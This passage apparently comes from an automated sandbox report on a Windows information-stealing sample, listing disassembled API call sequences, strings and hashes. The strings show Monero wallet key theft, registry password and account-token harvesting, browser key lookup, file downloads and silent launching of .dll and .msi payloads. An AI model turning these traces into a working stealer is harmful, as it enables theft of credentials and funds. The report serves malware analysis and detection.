                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: c4ee630838c7119118a1968249c882fe6afee143c565c033048450c52c07db79
                          • Instruction ID: 5011a10acaf648dbc825642be56327eb1d8efc47cbd4a4642be718d0fc37bb61
                          • Opcode Fuzzy Hash: c4ee630838c7119118a1968249c882fe6afee143c565c033048450c52c07db79
                          • Instruction Fuzzy Hash: BE1210719102089ADB15FBA0DD96FEEB738AF14300F508169F506761D1EF742B8ADFA2
                          APIs
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF6280: InternetOpenA.WININET(00C10DFE,00000001,00000000,00000000,00000000), ref: 00BF62E1
                            • Part of subcall function 00BF6280: StrCmpCA.SHLWAPI(?,006EE4D0), ref: 00BF6303
                            • Part of subcall function 00BF6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BF6335
                            • Part of subcall function 00BF6280: HttpOpenRequestA.WININET(00000000,GET,?,006EDC58,00000000,00000000,00400100,00000000), ref: 00BF6385
                            • Part of subcall function 00BF6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BF63BF
                            • Part of subcall function 00BF6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BF63D1
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C05318
                          • lstrlen.KERNEL32(00000000), ref: 00C0532F
                            • Part of subcall function 00C08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C08E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00C05364
                          • lstrlen.KERNEL32(00000000), ref: 00C05383
                          • lstrlen.KERNEL32(00000000), ref: 00C053AE
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 0f964bcf1738db0f124e857142888504a7954d816ddc85714f4d285242dba566
                          • Instruction ID: 6babed0e05436342d86f527b958ec3785f939c64abb474e205e4471a45d3a1c7
                          • Opcode Fuzzy Hash: 0f964bcf1738db0f124e857142888504a7954d816ddc85714f4d285242dba566
                          • Instruction Fuzzy Hash: E851FB309102489BCB14EF65CD96FEE7779AF14300F508528E9066B5D1EF346B4AEB62
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 624fea2cb9acb5754bf6b3d1e9fab63cb28c9afc6ca57bc09499b17b7adefb4e
                          • Instruction ID: 4d5613127ace80dc09586c5cc2a7d7310618993d81ec33fb83f9617e701ca2da
                          • Opcode Fuzzy Hash: 624fea2cb9acb5754bf6b3d1e9fab63cb28c9afc6ca57bc09499b17b7adefb4e
                          • Instruction Fuzzy Hash: 20C176B590021D9BCB14EF60DC89FEA7778BB64304F1445D8F50AA71C2DB70AA89DF91
                          APIs
                            • Part of subcall function 00C08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00C042EC
                          • lstrcat.KERNEL32(?,006EDD60), ref: 00C0430B
                          • lstrcat.KERNEL32(?,?), ref: 00C0431F
                          • lstrcat.KERNEL32(?,006ECF00), ref: 00C04333
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C08D90: GetFileAttributesA.KERNEL32(00000000,?,00BF1B54,?,?,00C1564C,?,?,00C10E1F), ref: 00C08D9F
                            • Part of subcall function 00BF9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BF9D39
                            • Part of subcall function 00BF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BF99EC
                            • Part of subcall function 00BF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BF9A11
                            • Part of subcall function 00BF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BF9A31
                            • Part of subcall function 00BF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BF148F,00000000), ref: 00BF9A5A
                            • Part of subcall function 00BF99C0: LocalFree.KERNEL32(00BF148F), ref: 00BF9A90
                            • Part of subcall function 00BF99C0: CloseHandle.KERNEL32(000000FF), ref: 00BF9A9A
                            • Part of subcall function 00C093C0: GlobalAlloc.KERNEL32(00000000,00C043DD,00C043DD), ref: 00C093D3
                          • StrStrA.SHLWAPI(?,006EDBC8), ref: 00C043F3
                          • GlobalFree.KERNEL32(?), ref: 00C04512
                            • Part of subcall function 00BF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BF4EEE,00000000,00000000), ref: 00BF9AEF
                            • Part of subcall function 00BF9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BF4EEE,00000000,?), ref: 00BF9B01
                            • Part of subcall function 00BF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BF4EEE,00000000,00000000), ref: 00BF9B2A
                            • Part of subcall function 00BF9AC0: LocalFree.KERNEL32(?,?,?,?,00BF4EEE,00000000,?), ref: 00BF9B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 00C044A3
                          • StrCmpCA.SHLWAPI(?,00C108D1), ref: 00C044C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00C044D2
                          • lstrcat.KERNEL32(00000000,?), ref: 00C044E5
                          • lstrcat.KERNEL32(00000000,00C10FB8), ref: 00C044F4
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: ead4e9312d63073e82090143979f4ba930b2fd6f761692a04ac5281b85b12d1d
                          • Instruction ID: 94a56a6a8b22a2806448858bcfc30824584496dce1ce3aadd209b15c97dd31f8
                          • Opcode Fuzzy Hash: ead4e9312d63073e82090143979f4ba930b2fd6f761692a04ac5281b85b12d1d
                          • Instruction Fuzzy Hash: 9E718AB6900208ABCB14FBA4DC8AFEE7778AB48300F048598F645A71C1DA35DB49DF51
                          APIs
                            • Part of subcall function 00BF12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF12B4
                            • Part of subcall function 00BF12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00BF12BB
                            • Part of subcall function 00BF12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BF12D7
                            • Part of subcall function 00BF12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BF12F5
                            • Part of subcall function 00BF12A0: RegCloseKey.ADVAPI32(?), ref: 00BF12FF
                          • lstrcat.KERNEL32(?,00000000), ref: 00BF134F
                          • lstrlen.KERNEL32(?), ref: 00BF135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00BF1377
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C08B60: GetSystemTime.KERNEL32(00C10E1A,006E9B18,00C105AE,?,?,00BF13F9,?,0000001A,00C10E1A,00000000,?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C08B86
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00BF1465
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BF99EC
                            • Part of subcall function 00BF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BF9A11
                            • Part of subcall function 00BF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BF9A31
                            • Part of subcall function 00BF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BF148F,00000000), ref: 00BF9A5A
                            • Part of subcall function 00BF99C0: LocalFree.KERNEL32(00BF148F), ref: 00BF9A90
                            • Part of subcall function 00BF99C0: CloseHandle.KERNEL32(000000FF), ref: 00BF9A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 00BF14EF
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: b282a56aaccb2c0caafdcdb58b4e050000c5f6b04f89838c1b878afe8be4af31
                          • Instruction ID: bd8b591b754cf1f509197fa93d049c7e18578d7ab21010a9c39ff7ad6a6fd817
                          • Opcode Fuzzy Hash: b282a56aaccb2c0caafdcdb58b4e050000c5f6b04f89838c1b878afe8be4af31
                          • Instruction Fuzzy Hash: 1F5113B19502199BCB15FB60DD96FED737CAF54300F4045E8B60AA20C1EE705B89DFA6
                          APIs
                            • Part of subcall function 00BF72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BF733A
                            • Part of subcall function 00BF72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BF73B1
                            • Part of subcall function 00BF72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BF740D
                            • Part of subcall function 00BF72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00BF7452
                            • Part of subcall function 00BF72D0: HeapFree.KERNEL32(00000000), ref: 00BF7459
                          • lstrcat.KERNEL32(00000000,00C117FC), ref: 00BF7606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00BF7648
                          • lstrcat.KERNEL32(00000000, : ), ref: 00BF765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00BF768F
                          • lstrcat.KERNEL32(00000000,00C11804), ref: 00BF76A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00BF76D3
                          • lstrcat.KERNEL32(00000000,00C11808), ref: 00BF76ED
                          • task.LIBCPMTD ref: 00BF76FB
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: 6033fef8551eb193a234dd56ad3726978bd7e6ce8a17e44490273715ffab95ea
                          • Instruction ID: b66fcd573d75b1ade0211e145489e9d09da9909a6f5517830f721950b30f4180
                          • Opcode Fuzzy Hash: 6033fef8551eb193a234dd56ad3726978bd7e6ce8a17e44490273715ffab95ea
                          • Instruction Fuzzy Hash: 1431017190010DDFCB08EBB5DC9ADFE77B5AB45301B184168F202B71A1DE35A98ADB51
                          APIs
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BF4839
                            • Part of subcall function 00BF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BF4849
                          • InternetOpenA.WININET(00C10DF7,00000001,00000000,00000000,00000000), ref: 00BF610F
                          • StrCmpCA.SHLWAPI(?,006EE4D0), ref: 00BF6147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BF618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BF61B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00BF61DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BF620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00BF6249
                          • InternetCloseHandle.WININET(?), ref: 00BF6253
                          • InternetCloseHandle.WININET(00000000), ref: 00BF6260
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: de4413ce45d01ed6bc06ab1fb25783e67ff1c3ae136ccf9ecb9eb3e9696d9b73
                          • Instruction ID: d9265e6434a6f201338e33aa7764c6c10429d31a73339f8b54bd0f6b70194322
                          • Opcode Fuzzy Hash: de4413ce45d01ed6bc06ab1fb25783e67ff1c3ae136ccf9ecb9eb3e9696d9b73
                          • Instruction Fuzzy Hash: D8515EB1A0021CAFDB20DF51DC89BEE77B8EB44701F1081A9A705B71C1DB746A89DF95
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BF733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BF73B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BF740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00BF7452
                          • HeapFree.KERNEL32(00000000), ref: 00BF7459
                          • task.LIBCPMTD ref: 00BF7555
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: 8c22010ecbcd1c4dd1e588fb34ad71eb79238c2573b77389a281b5f3b71c1639
                          • Instruction ID: 6acc3c6c941700ccfa1449d9915ba02f54aca5201c9a7636d32faee653f435f2
                          • Opcode Fuzzy Hash: 8c22010ecbcd1c4dd1e588fb34ad71eb79238c2573b77389a281b5f3b71c1639
                          • Instruction Fuzzy Hash: 3D6109B594416C9BDB24DB50DC45BE9B7B8BF48300F0481E9E689A7281DFB05BC9CFA1
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                          • lstrlen.KERNEL32(00000000), ref: 00BFBC9F
                            • Part of subcall function 00C08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C08E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00BFBCCD
                          • lstrlen.KERNEL32(00000000), ref: 00BFBDA5
                          • lstrlen.KERNEL32(00000000), ref: 00BFBDB9
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 5b02e66194fe972bb7b1ff2bfe5c6c7330c5ef74eb8a830eeb37ba4eb9c3a8f5
                          • Instruction ID: 0a5b038b3e208fd1f66373ffd710f63bec301f1de566b5d4f0fa2f8f1eb12c4b
                          • Opcode Fuzzy Hash: 5b02e66194fe972bb7b1ff2bfe5c6c7330c5ef74eb8a830eeb37ba4eb9c3a8f5
                          • Instruction Fuzzy Hash: E5B13E719102089BDF04FBA0DD96EEE7778AF54300F448568F606B71D1EF346A49EBA2
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 4397fd95eb7702f8ec939a636fe2a9e6b394439405358254e944402ad176c385
                          • Instruction ID: a827f1221600c1bdd5f67c804668095a266d170a9fd5dfdcdc54b127ecee2957
                          • Opcode Fuzzy Hash: 4397fd95eb7702f8ec939a636fe2a9e6b394439405358254e944402ad176c385
                          • Instruction Fuzzy Hash: F5F05E3090421DEFD7449FE6E94D72C7FB0FF04703F0801AAE649A6290D6704B91DB96
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BF4FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00BF4FD1
                          • InternetOpenA.WININET(00C10DDF,00000000,00000000,00000000,00000000), ref: 00BF4FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BF5011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BF5041
                          • InternetCloseHandle.WININET(?), ref: 00BF50B9
                          • InternetCloseHandle.WININET(?), ref: 00BF50C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 060bb41f1bc3b053188d94a2f6256d249def9bc71cfa1b5fbd44d85dcfa188dc
                          • Instruction ID: c29af1f21fafcb926eb9074a1d9960c0636c50a082d014dc849ebc44f7daf929
                          • Opcode Fuzzy Hash: 060bb41f1bc3b053188d94a2f6256d249def9bc71cfa1b5fbd44d85dcfa188dc
                          • Instruction Fuzzy Hash: 6C31FEB4A0021C9BDB20CF54DC89BDDB7B4EB48704F1081E9E709B7281D7706AC58F99
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006ED838,00000000,?,00C10E2C,00000000,?,00000000), ref: 00C08130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C08137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C08158
                          • wsprintfA.USER32 ref: 00C081AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2922868504-3474575989
                          • Opcode ID: 9d5ce6b07256e2a20029575942e6a4e62717ae38167705803c3653a249a5c796
                          • Instruction ID: be29e100c67efd2012d27a22b70401066832be5ab71f9498758ef411000d0180
                          • Opcode Fuzzy Hash: 9d5ce6b07256e2a20029575942e6a4e62717ae38167705803c3653a249a5c796
                          • Instruction Fuzzy Hash: 042127B1A44208ABDB00DFD5DC4AFAEBBB8EB44B10F104219F605BB2C0C77869058BA5
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C08426
                          • wsprintfA.USER32 ref: 00C08459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C0847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C0848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C08499
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,006EDA00,00000000,000F003F,?,00000400), ref: 00C084EC
                          • lstrlen.KERNEL32(?), ref: 00C08501
                          • RegQueryValueExA.ADVAPI32(00000000,006ED868,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C10B34), ref: 00C08599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C08608
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C0861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                           • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmp
